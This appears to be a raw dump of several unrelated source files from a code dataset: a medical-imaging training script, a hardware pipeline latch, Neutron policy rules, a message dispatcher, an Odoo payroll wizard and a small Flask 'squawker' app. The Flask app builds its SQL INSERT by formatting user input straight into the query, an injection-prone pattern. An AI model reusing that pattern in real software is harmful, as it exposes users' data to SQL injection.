for memory optimizer\n import tensorflow as tf\n from tensorflow.core.protobuf import rewriter_config_pb2\n from tensorflow.python.keras import backend as K\n config = tf.ConfigProto()\n config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.SCHEDULING_HEURISTICS\n K.set_session(tf.Session(config=config))\n\n# This is needed on non-PowerAI builds of TensorFlow.\n#config_memory_optimizer()\n\ndef setup_input_shape():\n if \"patch_shape\" in config and config[\"patch_shape\"] is not None:\n config[\"input_shape\"] = tuple([config[\"nb_channels\"]] + list(config[\"patch_shape\"]))\n else:\n config[\"input_shape\"] = tuple([config[\"nb_channels\"]] + list(config[\"image_shape\"]))\n\n\nconfig = dict()\nconfig[\"image_shape\"] = (128, 128, 128) # This determines what shape the images will be cropped/resampled to.\nconfig[\"patch_shape\"] = None # switch to None to train on the whole image\nconfig[\"labels\"] = (1, 2, 4) # the label numbers on the input image\nconfig[\"n_base_filters\"] = 16\nconfig[\"n_labels\"] = len(config[\"labels\"])\nconfig[\"all_modalities\"] = [\"t1\", \"t1Gd\", \"flair\", \"t2\"]\nconfig[\"training_modalities\"] = config[\"all_modalities\"] # change this if you want to only use some of the modalities\nconfig[\"nb_channels\"] = len(config[\"training_modalities\"])\nsetup_input_shape()\nconfig[\"truth_channel\"] = config[\"nb_channels\"]\nconfig[\"deconvolution\"] = True # if False, will use upsampling instead of deconvolution\n\nconfig[\"batch_size\"] = 1\nconfig[\"validation_batch_size\"] = 1\nconfig[\"n_epochs\"] = 500 # cutoff the training after this many epochs\nconfig[\"patience\"] = 10 # learning rate will be reduced after this many epochs if the validation loss is not improving\nconfig[\"early_stop\"] = 50 # training will be stopped after this many epochs without the validation loss improving\nif dist_mod:\n config[\"initial_learning_rate\"] = 5e-4 * dist_mod.size()\nelse:\n config[\"initial_learning_rate\"] = 5e-4\nconfig[\"learning_rate_drop\"] = 0.5 # factor by which the learning rate will be reduced\nconfig[\"validation_split\"] = 0.8 # portion of the data that will be used for training\nconfig[\"flip\"] = False # augments the data by randomly flipping an axis during\nconfig[\"permute\"] = True # data shape must be a cube. Augments the data by permuting in various directions\nconfig[\"distort\"] = None # switch to None if you want no distortion\nconfig[\"augment\"] = config[\"flip\"] or config[\"distort\"]\nconfig[\"validation_patch_overlap\"] = 0 # if > 0, during training, validation patches will be overlapping\nconfig[\"training_patch_start_offset\"] = (16, 16, 16) # randomly offset the first patch index by up to this offset\nconfig[\"skip_blank\"] = True # if True, then patches without any target will be skipped\n\nconfig[\"data_file\"] = os.path.abspath(\"brats_data.h5\")\nconfig[\"model_file\"] = os.path.abspath(\"isensee_2017_model.h5\")\nconfig[\"training_file\"] = os.path.abspath(\"isensee_training_ids.pkl\")\nconfig[\"validation_file\"] = os.path.abspath(\"isensee_validation_ids.pkl\")\nconfig[\"overwrite\"] = False # If True, will previous files. If False, will use previously written files.\n\n\ndef fetch_training_data_files(return_subject_ids=False):\n training_data_files = list()\n subject_ids = list()\n for subject_dir in glob.glob(os.path.join(os.path.dirname(__file__), \"data\", \"preprocessed\", \"*\", \"*\")):\n subject_ids.append(os.path.basename(subject_dir))\n subject_files = list()\n for modality in config[\"training_modalities\"] + [\"truth\"]:\n subject_files.append(os.path.join(subject_dir, modality + \".nii.gz\"))\n training_data_files.append(tuple(subject_files))\n if return_subject_ids:\n return training_data_files, subject_ids\n else:\n return training_data_files\n\n\ndef main(overwrite=False):\n # convert input images into an hdf5 file\n if overwrite or not os.path.exists(config[\"data_file\"]):\n training_files, subject_ids = fetch_training_data_files(return_subject_ids=True)\n\n write_data_to_file(training_files, config[\"data_file\"], image_shape=config[\"image_shape\"],\n subject_ids=subject_ids)\n data_file_opened = open_data_file(config[\"data_file\"])\n\n if not overwrite and os.path.exists(config[\"model_file\"]):\n model = load_old_model(config[\"model_file\"])\n else:\n # instantiate new model\n model = isensee2017_model(input_shape=config[\"input_shape\"], n_labels=config[\"n_labels\"],\n initial_learning_rate=config[\"initial_learning_rate\"],\n n_base_filters=config[\"n_base_filters\"])\n\n # get training and testing generators\n train_generator, validation_generator, n_train_steps, n_validation_steps = get_training_and_validation_generators(\n data_file_opened,\n batch_size=config[\"batch_size\"],\n data_split=config[\"validation_split\"],\n overwrite=overwrite,\n validation_keys_file=config[\"validation_file\"],\n training_keys_file=config[\"training_file\"],\n n_labels=config[\"n_labels\"],\n labels=config[\"labels\"],\n patch_shape=config[\"patch_shape\"],\n validation_batch_size=config[\"validation_batch_size\"],\n validation_patch_overlap=config[\"validation_patch_overlap\"],\n training_patch_start_offset=config[\"training_patch_start_offset\"],\n permute=config[\"permute\"],\n augment=config[\"augment\"],\n skip_blank=config[\"skip_blank\"],\n augment_flip=config[\"flip\"],\n augment_distortion_factor=config[\"distort\"])\n\n if FLAGS.steps_per_epoch:\n n_train_steps = FLAGS.steps_per_epoch\n if FLAGS.validation_steps:\n n_validation_steps = FLAGS.validation_steps\n\n # run training\n train_model(model=model,\n model_file=config[\"model_file\"],\n training_generator=train_generator,\n validation_generator=validation_generator,\n steps_per_epoch=n_train_steps,\n validation_steps=n_validation_steps,\n initial_learning_rate=config[\"initial_learning_rate\"],\n learning_rate_drop=config[\"learning_rate_drop\"],\n learning_rate_patience=config[\"patience\"],\n early_stopping_patience=config[\"early_stop\"],\n n_epochs=config[\"n_epochs\"],\n lms=FLAGS.lms,\n swapout_threshold=FLAGS.swapout_threshold,\n swapin_groupby=FLAGS.swapin_groupby,\n swapin_ahead=FLAGS.swapin_ahead,\n serialization=FLAGS.serialization,\n serialization_by_size=FLAGS.serialization_by_size,\n sync_mode=FLAGS.sync_mode,\n cuda_profile_epoch=FLAGS.cuda_profile_epoch,\n cuda_profile_batch_start=FLAGS.cuda_profile_batch_start,\n cuda_profile_batch_end=FLAGS.cuda_profile_batch_end)\n data_file_opened.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', type=int,\n default=500,\n help='Number of epochs to run. (Early stopping still '\n 'applies.) This parameter is useful for measuring '\n 'epoch times by running a few epochs rather than '\n 'a full training run to convergence.')\n parser.add_argument('--image_size', type=int,\n default=144,\n help='One dimension of the cubic size of the image. For '\n 'example for 192^3, pass 192.')\n parser.add_argument('--data_file_path', type=str,\n default='brats_data.h5',\n help='Path to the h5 data file containing training and '\n 'validation subjects.')\n # LMS parameters\n lms_group = parser.add_mutually_exclusive_group(required=False)\n lms_group.add_argument('--lms', dest='lms', action='store_true',\n help='Enable TFLMS')\n lms_group.add_argument('--no-lms', dest='lms', action='store_false',\n help='Disable TFLMS (Default)')\n parser.set_defaults(lms=False)\n parser.add_argument(\"--swapout_threshold\", type=int, default=-1,\n help='The TFLMS swapout_threshold parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--swapin_groupby\", type=int, default=-1,\n help='The TFLMS swapin_groupby parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--swapin_ahead\", type=int, default=-1,\n help='The TFLMS swapin_ahead parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--serialization\", type=int, default=-1,\n help='The layer to start serialization on. This '\n 'number will be passed to the LMS serialization '\n 'parameter as the start of a slice like this: '\n '[\\'parameter:\\']. See the TFLMS documentation '\n 'for more information. Default -1, no '\n 'serialization.')\n parser.add_argument(\"--serialization_by_size\", type=float, default=0,\n help='Serialize operations in levels of the '\n 'topological sort, if the cumulative memory '\n 'consumption of the level is greater than '\n 'serialization_by_size. The size unit is GiB. '\n 'Default 0 (turn off).')\n parser.add_argument(\"--sync_mode\", type=int, default=0,\n help='Sync mode of TFLMS. See the TFLMS documentation '\n 'for more information. Default: no '\n 'synchronization.')\n parser.add_argument('--steps_per_epoch', type=int,\n default=0,\n help='An override for the number of steps to run in an '\n 'epoch. This is useful when performance profiling '\n 'large resolutions to shorten runtimes. The default '\n 'behavior is to use the number of subjects and '\n 'batch size to calculate the correct number of '\n 'steps.')\n parser.add_argument('--validation_steps', type=int,\n default=0,\n help='An override for the number of validation steps to '\n 'run in an epoch. This is useful when performance '\n 'profiling large resolutions to shorten runtimes. '\n 'The default is to use the default number of '\n 'validation steps given the training/validation '\n 'subject split.')\n parser.add_argument('--randomize_model_name', type=bool,\n default=True,\n help='This will generate a random name for the model on '\n 'each run. Default is True')\n parser.add_argument('--cuda_profile_epoch', type=int,\n default=0,\n help='The epoch in which to start CUDA profiling '\n '(nvvp). Default is 0 (no profiling)')\n parser.add_argument('--cuda_profile_batch_start', type=int,\n default=1,\n help='The batch in which to start CUDA profiling '\n '(nvvp). Default is 1.')\n parser.add_argument('--cuda_profile_batch_end', type=int,\n default=2,\n help='The batch in which to end CUDA profiling '\n '(nvvp). Default is 2.')\n FLAGS = parser.parse_args()\n config['n_epochs'] = FLAGS.epochs\n config['image_shape'] = (FLAGS.image_size, FLAGS.image_size, FLAGS.image_size)\n setup_input_shape()\n config['data_file'] = FLAGS.data_file_path\n if FLAGS.randomize_model_name:\n random_part = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))\n config[\"model_file\"] = os.path.abspath(\"isensee_2017_model_%s.h5\" % random_part)\n print('Generated model filename: %s' % config[\"model_file\"])\n\n main(overwrite=config[\"overwrite\"])\n","sub_path":"brats/train_isensee2017.py","file_name":"train_isensee2017.py","file_ext":"py","file_size_in_byte":13864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424985444","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format=\"{asctime} {name} {levelname} - {message}\", style=\"{\")\nlog = logging.getLogger()\n\none_str = \"a\"\nlog.debug(one_str)\none = ord(one_str)\nlog.debug(one)\ntwo = one + 1\nlog.debug(two)\nlog.debug(chr(two))","sub_path":"py_ord.py","file_name":"py_ord.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223086168","text":"from myhdl import *\n\n@block\ndef id_ex(clk, readA_in, readB_in, offset_in, PC_in, RTa_in,\n RTb_in, RS_in, RD_in, WB_in, MemToReg_in, MemWrite_in,\n MemRead_in, lwFlush_in, brFlush_in, funct_in, opCode_in,\n readA_out, readB_out, offset_out, PC_out, RTa_out,\n RTb_out, RS_out, RD_out, WB_out, MemToReg_out, MemWrite_out,\n MemRead_out, lwFlush_out, brFlush_out, funct_out, opCode_out):\n\n class latches:\n readA = intbv(0, 0, 2**32)\n readB = intbv(0, 0, 2**32)\n offset = intbv(0, 0, 2**32)\n PC = intbv(0, 0, 2**32)\n RTa = intbv(0, 0, 2**5)\n RTb = intbv(0, 0, 2**5)\n RS = intbv(0, 0, 2**5)\n RD = intbv(0, 0, 2**5)\n WB = intbv(0, 0, 2**1)\n MemToReg = intbv(0, 0, 2**1)\n MemWrite = intbv(0, 0, 2**1)\n MemRead = intbv(0, 0, 2**1)\n lwFlush = intbv(0, 0, 2**1)\n brFlush = intbv(0, 0, 2**1)\n funct = intbv(0, 0, 2**6)\n opCode = intbv(0, 0, 2**3)\n\n @always(clk.negedge)\n def output():\n readA_out.next = latches.readA\n readB_out.next = latches.readB\n offset_out.next = latches.offset\n PC_out.next = latches.PC\n RTa_out.next = latches.RTa\n RTb_out.next = latches.RTb\n RS_out.next = latches.RS\n RD_out.next = latches.RD\n WB_out.next = latches.WB\n MemToReg_out.next = latches.MemToReg\n MemWrite_out.next = latches.MemWrite\n MemRead_out.next = latches.MemRead\n lwFlush_out.next = latches.lwFlush\n brFlush_out.next = latches.brFlush\n funct_out.next = latches.funct\n opCode_out.next = latches.opCode\n\n @always(clk.posedge)\n def input():\n latches.readA = readA_in\n latches.readB = readB_in\n latches.offset = offset_in\n latches.PC = PC_in\n latches.RTa = RTa_in\n latches.RTb = RTb_in\n latches.RS = RS_in\n latches.RD = RD_in\n latches.WB = WB_in\n latches.MemToReg = MemToReg_in\n latches.MemWrite = MemWrite_in\n latches.MemRead = MemRead_in\n latches.lwFlush = lwFlush_in\n latches.brFlush = brFlush_in\n latches.funct = funct_in\n latches.opCode = opCode_in\n\n return input, output\n","sub_path":"python/ID_EX.py","file_name":"ID_EX.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357941820","text":"\"\"\"\n비바라기를 시전하면 (N, 1), (N, 2), (N-1, 1), (N-1, 2)에 비구름이 생긴다. \n구름은 칸 전체를 차지한다. 이제 구름에 이동을 M번 명령하려고 한다. \ni번째 이동 명령은 방향 di과 거리 si로 이루어져 있다. 방향은 총 8개의 방향이 있으며,\n 8개의 정수로 표현한다. 1부터 순서대로 ←, ↖, ↑, ↗, →, ↘, ↓, ↙ 이다. 이동을 명령하면 다음이 순서대로 진행된다.\n\n1. 모든 구름이 di 방향으로 si칸 이동한다.\n2. 각 구름에서 비가 내려 구름이 있는 칸의 바구니에 저장된 물의 양이 1 증가한다.\n3. 구름이 모두 사라진다.\n4. 2에서 물이 증가한 칸 (r, c)에 물복사버그 마법을 시전한다. 물복사버그 마법을 사용하면, \n 대각선 방향으로 거리가 1인 칸에 물이 있는 바구니의 수만큼 (r, c)에 있는 바구니의 물이 양이 증가한다.\n 이때는 이동과 다르게 경계를 넘어가는 칸은 대각선 방향으로 거리가 1인 칸이 아니다.\n 예를 들어, (N, 2)에서 인접한 대각선 칸은 (N-1, 1), (N-1, 3)이고, (N, N)에서 인접한 대각선 칸은 (N-1, N-1)뿐이다.\n5. 바구니에 저장된 물의 양이 2 이상인 모든 칸에 구름이 생기고, 물의 양이 2 줄어든다. \n 이때 구름이 생기는 칸은 3에서 구름이 사라진 칸이 아니어야 한다.\n\nM번의 이동이 모두 끝난 후 바구니에 들어있는 물의 양의 합을 구해보자.\n\"\"\"\nfrom copy import deepcopy\n\n# direct2xy : 순서대로 ←, ↖, ↑, ↗, →, ↘, ↓, ↙\ndirect2xy = [[0, 0], [-1, 0], [-1, -1], [0, -1], [1, -1], [1, 0], [1, 1], [0, 1], [-1, 1]]\n\n\ndef cast_skill(MAP, move):\n n = len(MAP)\n cloud_temp = [[False for _ in range(n)] for _ in range(n)] # 구름 true, false\n cloud = deepcopy(cloud_temp)\n # 처음. 비바라기 시전 후 구름 위치 표시 ((N, 1), (N, 2), (N-1, 1), (N-1, 2))\n\n cloud[n - 1][0] = True\n cloud[n - 1][1] = True\n cloud[n - 2][0] = True\n cloud[n - 2][1] = True\n\n for d, s in move:\n new_cloud = deepcopy(cloud_temp)\n dx, dy = direct2xy[d]\n for y in range(n):\n for x in range(n):\n if cloud[y][x]:\n # 1름이 d 방향에서 s만큼 이동 - 경계를 넘은 0에서 왼쪽이나 위쪽이면 -> N-1\n new_y = (n + y + dy * s) % n\n new_x = (n + x + dx * s) % n\n new_cloud[new_y][new_x] = True\n # 2. 비를 내려 칸 +1\n MAP[new_y][new_x] += 1\n\n # 3. 각 구름은 대각선에 물이 1 이상인 칸의 수만큼 물 증가, 이 때 경계를 넘지 못함\n for y in range(n):\n for x in range(n):\n if new_cloud[y][x]:\n for dx, dy in [(-1, -1), (-1, 1), (1, -1), (1, 1)]:\n if 0 <= y + dy < n and 0 <= x + dx < n and MAP[y + dy][x + dx]:\n MAP[y][x] += 1\n \n # 5. 구름 사라짐 & 바구니에 저장된 물의 양이 2 이상인 모든 칸에 구름이 생기고, 물의 양이 2 줄어든다.\n for y in range(n):\n for x in range(n):\n if new_cloud[y][x]:\n new_cloud[y][x] = False\n elif MAP[y][x] >= 2:\n new_cloud[y][x] = True\n MAP[y][x] = MAP[y][x] - 2\n cloud = new_cloud\n return\n\n\ndef main():\n N, M = list(map(int, input().split()))\n MAP = [list(map(int, input().split())) for _ in range(N)]\n move = [list(map(int, input().split())) for _ in range(M)]\n cast_skill(MAP, move)\n print(sum([sum(ele) for ele in MAP]))\n\n\nmain()","sub_path":"백준/Python/카테고리/2회차/pra.py","file_name":"pra.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559085411","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_policy import policy\n\nfrom neutron.conf.policies import base\n\n\nCOLLECTION_PATH = '/agents'\nRESOURCE_PATH = '/agents/{id}'\n\n\nrules = [\n policy.DocumentedRuleDefault(\n 'get_agent',\n base.RULE_ADMIN_ONLY,\n 'Get an agent',\n [\n {\n 'method': 'GET',\n 'path': COLLECTION_PATH,\n },\n {\n 'method': 'GET',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'update_agent',\n base.RULE_ADMIN_ONLY,\n 'Update an agent',\n [\n {\n 'method': 'PUT',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_agent',\n base.RULE_ADMIN_ONLY,\n 'Delete an agent',\n [\n {\n 'method': 'DELETE',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'create_dhcp-network',\n base.RULE_ADMIN_ONLY,\n 'Add a network to a DHCP agent',\n [\n {\n 'method': 'POST',\n 'path': '/agents/{agent_id}/dhcp-networks',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_dhcp-networks',\n base.RULE_ADMIN_ONLY,\n 'List networks on a DHCP agent',\n [\n {\n 'method': 'GET',\n 'path': '/agents/{agent_id}/dhcp-networks',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_dhcp-network',\n base.RULE_ADMIN_ONLY,\n 'Remove a network from a DHCP agent',\n [\n {\n 'method': 'DELETE',\n 'path': '/agents/{agent_id}/dhcp-networks/{network_id}',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'create_l3-router',\n base.RULE_ADMIN_ONLY,\n 'Add a router to an L3 agent',\n [\n {\n 'method': 'POST',\n 'path': '/agents/{agent_id}/l3-routers',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_l3-routers',\n base.RULE_ADMIN_ONLY,\n 'List routers on an L3 agent',\n [\n {\n 'method': 'GET',\n 'path': '/agents/{agent_id}/l3-routers',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_l3-router',\n base.RULE_ADMIN_ONLY,\n 'Remove a router from an L3 agent',\n [\n {\n 'method': 'DELETE',\n 'path': '/agents/{agent_id}/l3-routers/{router_id}',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_dhcp-agents',\n base.RULE_ADMIN_ONLY,\n 'List DHCP agents hosting a network',\n [\n {\n 'method': 'GET',\n 'path': '/networks/{network_id}/dhcp-agents',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_l3-agents',\n base.RULE_ADMIN_ONLY,\n 'List L3 agents hosting a router',\n [\n {\n 'method': 'GET',\n 'path': '/routers/{router_id}/l3-agents',\n },\n ]\n ),\n]\n\n\ndef list_rules():\n return rules\n","sub_path":"neutron/conf/policies/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264049872","text":"# -*- coding: utf-8 -*-\n# vi:si:et:sw=4:sts=4:ts=4\n\nimport asyncio\nimport logging\n\nfrom .conf import settings\nfrom .exceptions import RejectMessage, IgnoreMessage\nfrom .utils import import_callable\n\nlogger = logging.getLogger(__name__)\n\n\nclass LoaferDispatcher(object):\n\n def __init__(self, routes, consumers=None):\n self.routes = routes\n self.consumers = consumers or []\n self._semaphore = asyncio.Semaphore(settings.LOAFER_MAX_JOBS)\n self._stop_consumers = True\n\n def get_consumer(self, route):\n for consumer in self.consumers:\n if consumer.source == route.source:\n return consumer\n\n # no consumer for given route, return default\n klass = import_callable(settings.LOAFER_DEFAULT_CONSUMER_CLASS)\n options = settings.LOAFER_DEFAULT_CONSUMER_OPTIONS\n return klass(route.source, options)\n\n def _translate_message(self, message, route):\n # in the future, we may change the route depending on message content\n try:\n content = route.message_translator.translate(message)['content']\n except Exception as exc:\n logger.exception(exc)\n logger.error('Error translating message content')\n return None\n\n return content\n\n async def dispatch_message(self, message, route):\n logger.info('Dispatching message to route={}'.format(route))\n\n content = self._translate_message(message, route)\n if content is None:\n logger.warning('Message will be ignored:\\n{}\\n'.format(message))\n return False\n\n # Since we don't know what will happen on message handler, use semaphore\n # to protect scheduling or executing too many coroutines/threads\n with await self._semaphore:\n try:\n await route.deliver(content)\n except RejectMessage as exc:\n logger.exception(exc)\n logger.warning('Explicit message rejection:\\n{}\\n'.format(message))\n # eg, we will return True at the end\n except IgnoreMessage as exc:\n logger.exception(exc)\n logger.warning('Explicit message ignore:\\n{}\\n'.format(message))\n return False\n except asyncio.CancelledError as exc:\n msg = '\"{}\" was cancelled, the message will be ignored:\\n{}\\n'\n logger.warning(msg.format(route.handler_name, message))\n return False\n except Exception as exc:\n logger.exception(exc)\n logger.error('Unhandled exception on {}'.format(route.handler_name))\n return False\n\n return True\n\n async def dispatch_consumers(self, sentinel=None):\n if sentinel is None or not callable(sentinel):\n self._stop_consumers = False\n stopper = self._default_sentinel\n else:\n stopper = sentinel\n\n while not stopper():\n for route in self.routes:\n consumer = self.get_consumer(route)\n messages = await consumer.consume()\n for message in messages:\n confirmation = await self.dispatch_message(message, route)\n if confirmation:\n await consumer.confirm_message(message)\n\n def _default_sentinel(self):\n return self._stop_consumers\n\n def stop_consumers(self):\n logger.info('Stopping consumers')\n self._stop_consumers = True\n","sub_path":"loafer/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619254452","text":"#Import statements\nfrom tkinter import *\n\n#Class for the GUI\nclass TopicGUI:\n def __init__(self, master, topic):\n canvas = topic\n canvas.pack(side = \"top\", fill = \"x\")\n\n#GUI Class for Tweet Data Graph\n#Based on code from:\n#https://www.daniweb.com/software-development/python/code/216816/draw-a-bar-graph-python\nclass tweetTopic(Canvas):\n #Constructor\n def __init__(self, master, entries, header):\n canvas_width = 1134\n canvas_height = 400\n Canvas.__init__(self, master, width = canvas_width, height = canvas_height, bg = \"white\")\n\n self.populateTopic(entries, canvas_width, canvas_height, header) \n\n #Populate graph\n def populateTopic(self, entries, width, height, header):\n x_gap = 130 #gap between left edge and y axis\n x_text_gap = 20 #gap between left edge and text beside y axis\n y_header_gap = 30 #gap between top edge and upper x axis\n y_gap = 20 #gap between lower edge and x axis\n x_max = width - x_gap * 2 #maximum width of bar\n for ctr in range(int(len(entries)/2)):\n entry_date = entries[ctr * 2]\n entry_topics = entries[(ctr * 2) + 1]\n x0 = x_gap\n y1 = (ctr + 1) * 20 + y_header_gap\n self.create_text(x_text_gap, y1, anchor = SW, text = entry_date) \n self.create_text(x0 - 40, y1, anchor = SW, text = entry_topics)\n self.create_text(x_text_gap, y_gap, anchor = SW, text = header)\n \n","sub_path":"topicgui.py","file_name":"topicgui.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340727426","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# NCTR, Nile Center for Technology Research\n# Copyright (C) 2011-2012 NCTR ().\n#\n##############################################################################\nfrom osv import fields,osv\nimport pooler\nimport time\nfrom tools.translate import _\n\nsuspend_type = [\n ('suspend', 'Suspend'),\n ('resume', 'Resume'),\n]\n\n\n#----------------------------------------\n#employee suspend\n#----------------------------------------\nclass emp_suspend(osv.osv_memory):\n _name ='emp.suspend'\n\n _columns = {\n\t\n 'employee_id': fields.many2one('hr.employee','Employees',required=True),\n 'suspend_date' :fields.date(\"Suspend Date\", required= True),\n\t'comments':fields.char(\"Comments\"),\n 'suspend_type':fields.selection(suspend_type,\"Suspend/Resume\"),\n 'company_id': fields.many2one('res.company','Company',readonly=True),\n }\n _defaults = {\n 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'emp.suspend', context=c),\n\t\t}\n\n\n def emp_suspend(self, cr, uid,ids, context=None):\n \"\"\"suspend and resume empployee salary.\n @return: dectionary \n \"\"\"\n for t in self.browse( cr, uid,ids):\n emp_obj = self.pool.get('hr.employee')\n susp_arch_obj = self.pool.get('hr.basic.salary.suspend.archive')\n employee = emp_obj.read(cr, uid, t.employee_id.id, ['salary_suspend'], context=context)\n if t.suspend_type == 'suspend':\n if employee['salary_suspend']:\n raise osv.except_osv(_('Sorry'), _('This Employee is Already Suspend'))\n sal_susp = True\n else:\n if not employee['salary_suspend']:\n raise osv.except_osv(_('Sorry'), _('This Employee is Already Resumed'))\n sal_susp = False\n susp_arch_vals = {\n 'employee_id': t.employee_id.id,\n 'suspend_date': t.suspend_date,\n 'comments': t.comments ,\n 'suspend_type': t.suspend_type ,\n }\n susp_arch_obj.create(cr, uid, susp_arch_vals, context=context)\n emp_obj.write(cr, uid, [t.employee_id.id], {'salary_suspend':sal_susp}, context=context)\n return {} \n\n\nemp_suspend()\n\n","sub_path":"v_7/Dongola/addons_backup/9-1/hr_payroll_custom/hr_payroll_custom/wizard/employee_salary_suspended.py","file_name":"employee_salary_suspended.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274746040","text":"# -*- coding:utf-8 -*-\nimport redis\nfrom honeycomb import Dict\n\nSOCIAL_REDIS_ONLINE = \\\n {\n 'host': '192.20.20.8',\n 'port': 6376,\n 'db': 3\n }\n\nSOCIAL_REDIS_LOCAL = \\\n {\n 'host': '172.100.102.101',\n 'port': 6379,\n 'db': 0\n }\n\ntry:\n init_conf = Dict(key='project_honey_init')\n environ = init_conf['environ']\n SOCIAL_REDIS = SOCIAL_REDIS_LOCAL if environ == 'local_debug' else SOCIAL_REDIS_ONLINE\nexcept Exception:\n SOCIAL_REDIS = SOCIAL_REDIS_ONLINE\n\n\nclass MessageBean(object):\n def __init__(self, msg):\n info_list = msg[0].split('_')\n timestamp = msg[1]\n self.executor_id = info_list[0]\n self.action = info_list[1]\n self.obj = info_list[2]\n self.obj_id = info_list[3]\n self.timestamp = int(timestamp)\n\n\ndef get_production_redis_object():\n redis_object = redis.StrictRedis(host=SOCIAL_REDIS['host'],\n port=SOCIAL_REDIS['port'],\n db=SOCIAL_REDIS['db'])\n return redis_object\n","sub_path":"bin/views/social/social_base.py","file_name":"social_base.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"575044139","text":"#!/usr/bin/env python3\n\nfrom os.path import join\n\nimport hong2p.util as u\n\n\ndef test_load_experiment():\n r1 = join(u.raw_data_root(), '2019-11-21/4/tif_stacks/fn_0001.tif')\n r2 = join(u.raw_data_root(), '2020-03-09/2/fn_002/tif_stacks/fn_002.tif')\n c1 = join(u.analysis_output_root(),\n '2019-11-21/4/tif_stacks/fn_0001_nr.tif'\n )\n tiffs = [c1, r1, r2]\n for t in tiffs: #[2:]:\n print(t)\n data = u.load_recording(t)\n #import ipdb; ipdb.set_trace()\n\n\nif __name__ == '__main__':\n test_load_experiment()\n\n","sub_path":"test/test_load_recording.py","file_name":"test_load_recording.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178117028","text":"from flask import Flask, g, render_template, request, redirect\nimport sqlite3\nfrom datetime import datetime\n\n# -- leave these lines intact --\napp = Flask(__name__)\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n db_name = app.config.get('DATABASE', 'squawker.db')\n g.sqlite_db = sqlite3.connect(db_name)\n\n return g.sqlite_db\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, 'sqlite_db', None)\n if db is not None:\n db.close()\n# ------------------------------\n\n\n@app.route('/')\ndef root():\n conn = get_db()\n c = conn.cursor()\n s = \"SELECT squawk from squawks order by submitdate desc\"\n c.execute(s)\n allrows = c.fetchall()\n allsquawks = []\n for s in allrows:\n allsquawks.append(s[0])\n return render_template('home.html', allsquawks=allsquawks)\n\n\n@app.route('/submitNewSquawk', methods=[\"POST\"])\ndef submitNewSquawk():\n if len(str(request.form[\"squawk\"])) > 140:\n return render_template('home.html', error=\"Invalid squawk, too long\")\n conn = get_db()\n c = conn.cursor()\n time = str(datetime.now())\n s = 'INSERT INTO squawks VALUES (\"{}\", \"{}\")'.format(time, str(request.form[\"squawk\"]))\n c.execute(s)\n conn.commit()\n conn.close()\n return redirect('/')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"squawker/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125801901","text":"import csv\nimport numpy as np\nimport os\namino={'A':0,'C':1,'G':2,'T':3}\ndef get_labels(file_path):\n labels = []\n with 